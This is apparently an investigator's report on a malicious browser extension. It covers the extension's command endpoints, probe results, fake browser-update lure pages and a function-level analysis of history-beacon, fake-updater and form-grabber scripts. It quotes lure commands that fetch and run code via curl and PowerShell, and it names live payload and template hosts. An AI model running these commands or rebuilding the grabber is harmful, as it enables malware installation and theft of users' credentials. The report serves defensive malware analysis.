Complete Security Report

Complete Security Report

Generated: 2026-03-07 Target extension ID: gengfhhkjekmlejbhmmopegofnoifnjp

1) Endpoint Enumeration and Data Available via Self-Registered UUID

1.1 Endpoint families discovered in code

From background.js and callback scripts, the extension/backend communication surface is:

• GET /extensions/setup
• GET /extensions/callback
• GET /extensions/uninstall (used as uninstall URL)
• POST /extensions/finish
• GET /extensions/exe/get-update-data
• GET /extensions/exe/{modal|bar}/can-show
• POST /extensions/exe/{modal|bar}/show-later

1.2 Verified live behavior (active UUID)

Probe folder: investigation/probe-20260307-234815-1d4b0fa7 UUID: 1d4b0fa7-c150-4b55-bb3b-1ed4bb5a7632

Endpoint	Method	Result	Data returned / accepted
/extensions/setup	GET	200	{"success":true}
/extensions/callback	GET	200	Returns JS task array (history/updater/grabber scripts)
/extensions/exe/get-update-data	GET	200	mode:"file", payload URL: https://baysideceu.com/wp-content/uploads/googleupdate.exe
/extensions/exe/modal/can-show	GET	200	{"success":true,"message":"modal can be shown"...}
/extensions/exe/bar/can-show	GET	200	{"success":true,"message":"bar can be shown"...}
/extensions/exe/modal/show-later	POST	200	nextShowAt, delayHours:1
/extensions/exe/bar/show-later	POST	200	nextShowAt, delayHours:1
/extensions/finish?task_id=64067	POST	200	{"success":true}
/extensions/finish?task_id=64068	POST	200	{"success":true}
/extensions/finish?task_id=64069	POST	200	{"success":true}

1.3 Verified behavior after uninstall state

Probe folder: investigation/probe-20260307-233702-b3928423 UUID: b3928423-3198-494a-9630-6894921545ca

After /extensions/uninstall, finishing tasks returns bot-uninstalled errors:

• 12_finish_64064_retest.txt
• 13_finish_64065_retest.txt
• 14_finish_64066_retest.txt

Observed response pattern:

• statusCode: 400
• error: BOT_UNINSTALLED
• message: Bot is marked as uninstalled

1.4 Original victim UUID behavior

Original UUID: xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

From saved evidence:

• /extensions/callback => Bot is uninstalled (400)
• /extensions/exe/modal/can-show and /extensions/exe/bar/can-show => BOT_UNINSTALLED
• /extensions/exe/get-update-data still returned active payload URL (200)

2) Fake Update HTML Templates (Social Engineering Content)

Templates fetched from https://ggl.lat and saved in:

• investigation/probe-20260307-233702-b3928423/ggl_templates/

Available templates captured:

• chrome_update.html
• chrome_modal.html
• chrome_bar.html
• edge_update.html
• edge_modal.html
• opera_update.html
• opera_modal.html

Failed endpoints at capture time:

• edge/bar -> 500 Internal Server Error
• opera/bar -> 500 Internal Server Error

2.1 Notable lure/pressure content

From chrome_modal.html:

• “Update required”
• “…further attempts to access websites are blocked.”

From chrome_bar.html:

• “Update to keep using Chrome after …”
• “Important Chrome Update”
• “Warning: Critical Update Required”
• CTA buttons: “Update now”, “Later”, “Learn more”

From chrome_update.html:

• “Copy update code” workflow
• Injected command examples include:
  • sudo bash -c "$(curl -fsSL https://update.chrome.google.com/install)"
  • powershell -Command "Invoke-WebRequest -Uri https://update.chrome.google.com/install.exe -OutFile chrome_update.exe; Start-Process chrome_update.exe"

3) Callback File Function-by-Function Analysis

Analyzed files:

• investigation/callback_scripts/1-superior-history.js
• investigation/callback_scripts/2-superior-updater.js
• investigation/callback_scripts/3-superior-grabber.js

3.1 1-superior-history.js

• mark()
  • Prevents duplicate execution by checking/creating a DOM marker with id superior-history.
• Async IIFE
  • Calls mark(); exits if already injected.
  • POSTs to /extensions/finish?uuid=...&task_id=... with JSON:
    • action: "History"
    • current page url
    • page title
    • name: "browser_history"
  • Errors are silently swallowed.

Net effect: single fire-and-forget beacon with page URL/title tagged as history action.

3.2 2-superior-updater.js

• getPlatform()
  • Maps navigator.platform to MACOS|WINDOWS|LINUX|unknown.
• detectBrowser()
  • UA parsing for chrome|edge|opera|firefox|safari; throws on unsupported.
• waitForElement(selector, timeout)
  • MutationObserver wait helper for DOM id; rejects on timeout.
• renderHTML(htmlText, targetElementId, options)
  • Parses fetched HTML and injects it into target container or replaces full page.
  • Copies <style>/<link rel=stylesheet> into page, avoiding duplicates.
  • Clones/inserts scripts and retries initApp blocks.
  • Modal mode adjusts overlay z-index and pointer behavior.
• canShow(component)
  • GET /extensions/exe/{component}/can-show (modal/bar).
• getUpdateData()
  • GET /extensions/exe/get-update-data; returns JSON used as behavior config.
• showLater(component)
  • POST /extensions/exe/{component}/show-later.
• finish()
  • POST /extensions/finish?uuid=...&task_id=...&platform=....
• loadContent(component, params)
  • Fetches remote HTML from https://ggl.lat/{browser}/{component}/.
• injectPage()
  • Loads update config + update template and binds action handlers.
• setupEventHandlers(updateData)
  • mode=file: clicking update button downloads backend-provided payload URL, then calls finish().
  • mode=command: copies backend-provided command to clipboard, then calls finish().
• injectModal()
  • Checks can-show, loads modal template, injects full-screen modal.
• setupModalEventHandlers()
  • Close -> showLater('modal') and remove modal.
  • Update -> redirect to official browser update page URL.
• injectBar()
  • Checks can-show, injects top bar template, adjusts body top padding.
• setupBarEventHandlers()
  • Handles learn-more, update-now, later flows; later flow POSTs showLater('bar').
• runInjection()
  • Decides whether to inject update page vs modal+bar by current URL matching.
• Final IIFE init block
  • Debounced bootstrap, listens to popstate/hashchange, and reinjects if marker removed.

Console output behavior in this file:

• Uses console.log, console.warn, console.error in multiple flows.

3.3 3-superior-grabber.js

• ALLOWED_INPUTS
  • Large keyword list for likely sensitive fields (email/phone/name/password/card/address/token/ssn/etc).
• debugLog(message, data)
  • Wrapper around console.log with [superior-grabber] tag.
• grab(e)
  • Reads target input value, dedupes by raw value (sentValues Set), and POSTs full captured value via /extensions/finish?...task_id=....
  • Payload includes URL, title, element name/id/type, full value, timestamp.
• isVisible(elem)
  • Visibility filter (display/visibility/opacity/offsetParent).
• shouldGrabInput(input)
  • Matches field name/id/type/placeholder against ALLOWED_INPUTS; requires value length >=2.
• attachListeners(input)
  • Adds delayed handlers for input/change/blur/focus to call grab when predicate matches.
• checkExistingInputs()
  • Scans existing inputs/select/textarea, attaches handlers, and submits prefilled visible matching values.
• setupMutationObserver()
  • Watches added DOM nodes and hooks new form elements dynamically.
• initGrabber IIFE
  • Runs initial scan after DOM ready, sets observer, and on mousemove does periodic rescans to submit matching values.

Console output behavior in this file:

• Extensive console logging through debugLog plus error logging.

4) Practical Reporting Takeaways

• Backend control is task-driven: /callback supplies executable JS with per-bot UUID and task IDs.
• Remote content (ggl.lat) provides browser-themed social-engineering UI and command/download prompts.
• /finish is used as collection/completion sink and accepts task-labeled payloads when bot is active.
• grabber logic captures filled form values for many sensitive field classes.

5) Evidence Index

Primary evidence directories:

• investigation/probe-20260307-233702-b3928423
• investigation/probe-20260307-234815-1d4b0fa7
• investigation/callback_scripts
• investigation/REPORT_SUMMARY.md
• investigation/EVIDENCE_TIMELINE.md